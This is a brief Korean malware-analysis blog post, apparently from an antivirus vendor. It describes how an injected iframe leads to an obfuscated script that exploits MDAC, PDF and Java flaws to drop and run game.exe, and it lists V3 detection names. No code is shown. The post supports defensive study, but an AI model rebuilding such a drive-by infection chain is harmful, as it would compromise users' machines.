이어서 난독화된 악성 스크립트를 살펴 보도록 하겠습니다.


<삽입된 iframe에 의해 연결된 페이지 정보>


상기와 같이 난독화된 악성 스크립트는 악성 스크립트 제작자가 제작한 루틴 및 사용되지 않는 쓰레기 코드로 구성되어 있으며 디코딩 후 실제 악의적인 웹 페이지가 완성이 되게 됩니다. 



<최종 디코딩 된 악성 스크립트>

최종 디코딩된 악성 스크립트는 MDAC[Microsoft Data Access Components], PDF, JAVA 취약점을 이용하여 악성코드를 로컬에 저장하고 실행하게 됩니다. 


<취약점을 이용한 파일 및 다운로드 된 파일>
 
취약점을 이용한 파일 및 game.exe 파일은 아래와 같은 진단명으로 V3에서 진단/치료가 가능합니다.

game.exe
 -> Win-Trojan/Agent.26112.RQ
Notes10.pdf
 -> PDF/Exlpoit
Applet10.html
 ->HTML/Agent



다음 글에서 다운로드 된 game.exe 파일 실행 시 증상에 대해 살펴보도록 하겠습니다.




신고
Creative Commons License
Creative Commons License
Posted by 비회원